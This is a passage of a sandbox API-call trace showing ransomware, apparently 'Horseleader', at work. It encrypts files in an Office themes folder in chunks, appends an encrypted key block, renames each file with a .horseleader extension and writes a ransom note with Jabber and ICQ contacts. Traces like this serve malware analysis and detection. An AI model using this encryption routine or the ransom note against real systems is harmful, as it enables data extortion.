ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x6d05ead0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x6d05ead0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x96d8c05d, dwReserved1=0xeae5f6ce, cFileName="..", cAlternateFileName="")) returned 1 [0246.899] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0246.899] wnsprintfW (in: pszDest=0x7e2960, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECLIPSE\\..") returned 70 [0246.899] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0246.899] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0246.899] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf9d57e00, ftCreationTime.dwHighDateTime=0x1cab7f1, ftLastAccessTime.dwLowDateTime=0x51eb22b0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xf9d57e00, ftLastWriteTime.dwHighDateTime=0x1cab7f1, nFileSizeHigh=0x0, nFileSizeLow=0x1cf31, dwReserved0=0x96d8c05d, dwReserved1=0xeae5f6ce, cFileName="ECLIPSE.ELM", cAlternateFileName="")) returned 1 [0246.899] lstrcmpiW (lpString1="ECLIPSE.ELM", lpString2="Windows") returned -1 [0246.899] wnsprintfW (in: pszDest=0x7e2960, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECLIPSE\\ECLIPSE.ELM") returned 79 [0246.899] StrStrIW (lpFirst="ECLIPSE.ELM", lpSrch=".horseleader") returned 0x0 [0246.899] lstrcmpW (lpString1="ECLIPSE.ELM", lpString2="#Decrypt#.txt") returned 1 [0246.899] lstrcmpW (lpString1="ECLIPSE.ELM", lpString2="_uninstalling_.png") returned 1 [0246.899] lstrlenW (lpString=".testttjffg") returned 11 [0246.899] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECLIPSE\\ECLIPSE.ELM", lpSrch=".testttjffg") returned 0x0 [0246.899] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0246.899] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0246.899] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECLIPSE\\ECLIPSE.ELM" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\eclipse\\eclipse.elm"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0246.900] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECLIPSE\\ECLIPSE.ELM") returned 79 [0246.900] StrStrW (lpFirst="ECLIPSE.ELM", lpSrch=".txt") returned 0x0 [0246.900] GetFileSizeEx (in: hFile=0x1a4, lpFileSize=0x32aeb58 | out: lpFileSize=0x32aeb58*=118577) returned 1 [0246.900] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0246.900] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0246.903] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0246.903] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0246.904] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xbf98, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0246.904] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0246.904] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0246.904] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0246.904] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x17f31, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0246.905] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0246.905] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0246.905] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0246.905] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0246.905] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aeb50*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aeb50*, lpNumberOfBytesWritten=0x32aeb7c*=0x4, lpOverlapped=0x0) returned 1 [0246.905] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aea98*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aea98*, lpNumberOfBytesWritten=0x32aeb7c*=0x80, lpOverlapped=0x0) returned 1 [0246.905] CloseHandle (hObject=0x1a4) returned 1 [0246.906] GetProcessHeap () returned 0x780000 [0246.906] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7e31a8 [0246.906] wnsprintfW (in: pszDest=0x7e31a8, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECLIPSE\\ECLIPSE.ELM.horseleader") returned 91 [0246.906] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECLIPSE\\ECLIPSE.ELM" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\eclipse\\eclipse.elm"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECLIPSE\\ECLIPSE.ELM.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\eclipse\\eclipse.elm.horseleader")) returned 1 [0246.907] GetProcessHeap () returned 0x780000 [0246.907] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7e31a8 | out: hHeap=0x780000) returned 1 [0246.907] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x376bcd00, ftCreationTime.dwHighDateTime=0x1c3ee72, ftLastAccessTime.dwLowDateTime=0x608b7590, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x376bcd00, ftLastWriteTime.dwHighDateTime=0x1c3ee72, nFileSizeHigh=0x0, nFileSizeLow=0x253, dwReserved0=0x96d8c05d, dwReserved1=0xeae5f6ce, cFileName="ECLIPSE.INF", cAlternateFileName="")) returned 1 [0246.907] lstrcmpiW (lpString1="ECLIPSE.INF", lpString2="Windows") returned -1 [0246.907] wnsprintfW (in: pszDest=0x7e2960, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECLIPSE\\ECLIPSE.INF") returned 79 [0246.907] StrStrIW (lpFirst="ECLIPSE.INF", lpSrch=".horseleader") returned 0x0 [0246.907] lstrcmpW (lpString1="ECLIPSE.INF", lpString2="#Decrypt#.txt") returned 1 [0246.907] lstrcmpW (lpString1="ECLIPSE.INF", lpString2="_uninstalling_.png") returned 1 [0246.907] lstrlenW (lpString=".testttjffg") returned 11 [0246.907] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECLIPSE\\ECLIPSE.INF", lpSrch=".testttjffg") returned 0x0 [0246.907] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0246.907] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0246.907] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECLIPSE\\ECLIPSE.INF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\eclipse\\eclipse.inf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0246.908] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECLIPSE\\ECLIPSE.INF") returned 79 [0246.908] StrStrW (lpFirst="ECLIPSE.INF", lpSrch=".txt") returned 0x0 [0246.909] GetFileSizeEx (in: hFile=0x1a4, lpFileSize=0x32aeb58 | out: lpFileSize=0x32aeb58*=595) returned 1 [0246.909] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x253, lpOverlapped=0x0) returned 1 [0246.910] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xfffffdad, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0246.910] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x253, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x253, lpOverlapped=0x0) returned 1 [0246.910] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0246.910] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aeb50*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aeb50*, lpNumberOfBytesWritten=0x32aeb7c*=0x4, lpOverlapped=0x0) returned 1 [0246.910] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aea98*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aea98*, lpNumberOfBytesWritten=0x32aeb7c*=0x80, lpOverlapped=0x0) returned 1 [0246.910] CloseHandle (hObject=0x1a4) returned 1 [0246.911] GetProcessHeap () returned 0x780000 [0246.911] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7e31a8 [0246.911] wnsprintfW (in: pszDest=0x7e31a8, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECLIPSE\\ECLIPSE.INF.horseleader") returned 91 [0246.911] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECLIPSE\\ECLIPSE.INF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\eclipse\\eclipse.inf"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECLIPSE\\ECLIPSE.INF.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\eclipse\\eclipse.inf.horseleader")) returned 1 [0246.914] GetProcessHeap () returned 0x780000 [0246.914] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7e31a8 | out: hHeap=0x780000) returned 1 [0246.914] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x376bcd00, ftCreationTime.dwHighDateTime=0x1c3ee72, ftLastAccessTime.dwLowDateTime=0x6d05ead0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x376bcd00, ftLastWriteTime.dwHighDateTime=0x1c3ee72, nFileSizeHigh=0x0, nFileSizeLow=0x543, dwReserved0=0x96d8c05d, dwReserved1=0xeae5f6ce, cFileName="PREVIEW.GIF", cAlternateFileName="")) returned 1 [0246.914] lstrcmpiW (lpString1="PREVIEW.GIF", lpString2="Windows") returned -1 [0246.914] wnsprintfW (in: pszDest=0x7e2960, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECLIPSE\\PREVIEW.GIF") returned 79 [0246.914] StrStrIW (lpFirst="PREVIEW.GIF", lpSrch=".horseleader") returned 0x0 [0246.914] lstrcmpW (lpString1="PREVIEW.GIF", lpString2="#Decrypt#.txt") returned 1 [0246.914] lstrcmpW (lpString1="PREVIEW.GIF", lpString2="_uninstalling_.png") returned 1 [0246.914] lstrlenW (lpString=".testttjffg") returned 11 [0246.914] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECLIPSE\\PREVIEW.GIF", lpSrch=".testttjffg") returned 0x0 [0246.914] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0246.914] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0246.914] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECLIPSE\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\eclipse\\preview.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0246.916] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECLIPSE\\PREVIEW.GIF") returned 79 [0246.916] StrStrW (lpFirst="PREVIEW.GIF", lpSrch=".txt") returned 0x0 [0246.916] GetFileSizeEx (in: hFile=0x1a4, lpFileSize=0x32aeb58 | out: lpFileSize=0x32aeb58*=1347) returned 1 [0246.916] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x543, lpOverlapped=0x0) returned 1 [0246.918] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xfffffabd, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0246.918] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x543, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x543, lpOverlapped=0x0) returned 1 [0246.918] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0246.918] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aeb50*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aeb50*, lpNumberOfBytesWritten=0x32aeb7c*=0x4, lpOverlapped=0x0) returned 1 [0246.918] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aea98*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aea98*, lpNumberOfBytesWritten=0x32aeb7c*=0x80, lpOverlapped=0x0) returned 1 [0246.918] CloseHandle (hObject=0x1a4) returned 1 [0246.918] GetProcessHeap () returned 0x780000 [0246.918] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7e31a8 [0246.918] wnsprintfW (in: pszDest=0x7e31a8, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECLIPSE\\PREVIEW.GIF.horseleader") returned 91 [0246.919] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECLIPSE\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\eclipse\\preview.gif"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECLIPSE\\PREVIEW.GIF.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\eclipse\\preview.gif.horseleader")) returned 1 [0246.919] GetProcessHeap () returned 0x780000 [0246.919] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7e31a8 | out: hHeap=0x780000) returned 1 [0246.919] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x376bcd00, ftCreationTime.dwHighDateTime=0x1c3ee72, ftLastAccessTime.dwLowDateTime=0x5ad387f0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x376bcd00, ftLastWriteTime.dwHighDateTime=0x1c3ee72, nFileSizeHigh=0x0, nFileSizeLow=0x7e93, dwReserved0=0x96d8c05d, dwReserved1=0xeae5f6ce, cFileName="THMBNAIL.PNG", cAlternateFileName="")) returned 1 [0246.919] lstrcmpiW (lpString1="THMBNAIL.PNG", lpString2="Windows") returned -1 [0246.919] wnsprintfW (in: pszDest=0x7e2960, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECLIPSE\\THMBNAIL.PNG") returned 80 [0246.919] StrStrIW (lpFirst="THMBNAIL.PNG", lpSrch=".horseleader") returned 0x0 [0246.920] lstrcmpW (lpString1="THMBNAIL.PNG", lpString2="#Decrypt#.txt") returned 1 [0246.920] lstrcmpW (lpString1="THMBNAIL.PNG", lpString2="_uninstalling_.png") returned 1 [0246.920] lstrlenW (lpString=".testttjffg") returned 11 [0246.920] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECLIPSE\\THMBNAIL.PNG", lpSrch=".testttjffg") returned 0x0 [0246.920] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0246.920] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0246.920] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECLIPSE\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\eclipse\\thmbnail.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0246.920] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECLIPSE\\THMBNAIL.PNG") returned 80 [0246.920] StrStrW (lpFirst="THMBNAIL.PNG", lpSrch=".txt") returned 0x0 [0246.920] GetFileSizeEx (in: hFile=0x1a4, lpFileSize=0x32aeb58 | out: lpFileSize=0x32aeb58*=32403) returned 1 [0246.921] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0246.927] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0246.927] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0246.927] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x2e93, lpOverlapped=0x0) returned 1 [0246.927] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffd16d, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0246.927] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x2e93, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x2e93, lpOverlapped=0x0) returned 1 [0246.928] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0246.928] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aeb50*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aeb50*, lpNumberOfBytesWritten=0x32aeb7c*=0x4, lpOverlapped=0x0) returned 1 [0246.928] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aea98*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aea98*, lpNumberOfBytesWritten=0x32aeb7c*=0x80, lpOverlapped=0x0) returned 1 [0246.928] CloseHandle (hObject=0x1a4) returned 1 [0246.928] GetProcessHeap () returned 0x780000 [0246.928] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7e31a8 [0246.928] wnsprintfW (in: pszDest=0x7e31a8, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECLIPSE\\THMBNAIL.PNG.horseleader") returned 92 [0246.928] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECLIPSE\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\eclipse\\thmbnail.png"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECLIPSE\\THMBNAIL.PNG.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\eclipse\\thmbnail.png.horseleader")) returned 1 [0246.929] GetProcessHeap () returned 0x780000 [0246.929] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7e31a8 | out: hHeap=0x780000) returned 1 [0246.929] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x376bcd00, ftCreationTime.dwHighDateTime=0x1c3ee72, ftLastAccessTime.dwLowDateTime=0x5ad387f0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x376bcd00, ftLastWriteTime.dwHighDateTime=0x1c3ee72, nFileSizeHigh=0x0, nFileSizeLow=0x7e93, dwReserved0=0x96d8c05d, dwReserved1=0xeae5f6ce, cFileName="THMBNAIL.PNG", cAlternateFileName="")) returned 0 [0246.929] FindClose (in: hFindFile=0x7c6760 | out: hFindFile=0x7c6760) returned 1 [0246.929] wnsprintfW (in: pszDest=0x7e2960, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECLIPSE\\#Decrypt#.txt") returned 81 [0246.929] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECLIPSE\\#Decrypt#.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\eclipse\\#decrypt#.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0246.930] lstrlenA (lpString="All your files have been ENCRYPTED!!!\r\nWrite to our ICQ @Horseleader\r\nOr contact us via jabber - horseleader@xmpp.jp\r\nJabber client installation instructions:\r\nDownload the jabber (Pidgin) client from https://pidgin.im/download/windows/ \r\n\r\nAfter installation, the Pidgin client will prompt you to create a new account. \r\nClick - Add\r\nIn the -Protocol field, select XMPP \r\nIn -Username - come up with any name \r\nIn the field -domain - enter any jabber-server, there are a lot of them, for example - exploit.im \r\nCreate a password\r\nAt the bottom, put a tick -Create account \r\nClick add \r\nIf you selected -domain - exploit.im, then a new window should appear in which you will need to re-enter your data: \r\nUser \r\npassword \r\nYou will need to follow the link to the captcha (there you will see the characters that you need to enter in the field below) \r\nIf you don't understand our Pidgin client installation instructions, you can find many installation tutorials on youtube - https://www.youtube.com/results?search_query=pidgin+jabber+install \r\nIf you have not received a response from us then we may have technical problems and please write to us using Jaber here bigbosshorse@xmpp.jp or on icq \r\nAttention!\r\nDo not rename encrypted files. \r\nDo not try to decrypt your data using third party software, it may cause permanent data loss. \r\nDecryption of your files with the help of third parties may cause increased price (they add their fee to our) or you can become a victim of a scam. \r\ntell your unique ID\r\n") returned 1508 [0246.930] WriteFile (in: hFile=0x158, lpBuffer=0xb41ca0*, nNumberOfBytesToWrite=0x5e4, lpNumberOfBytesWritten=0x32aeb98, lpOverlapped=0x0 | out: lpBuffer=0xb41ca0*, lpNumberOfBytesWritten=0x32aeb98*=0x5e4, lpOverlapped=0x0) returned 1 [0246.931] lstrlenA 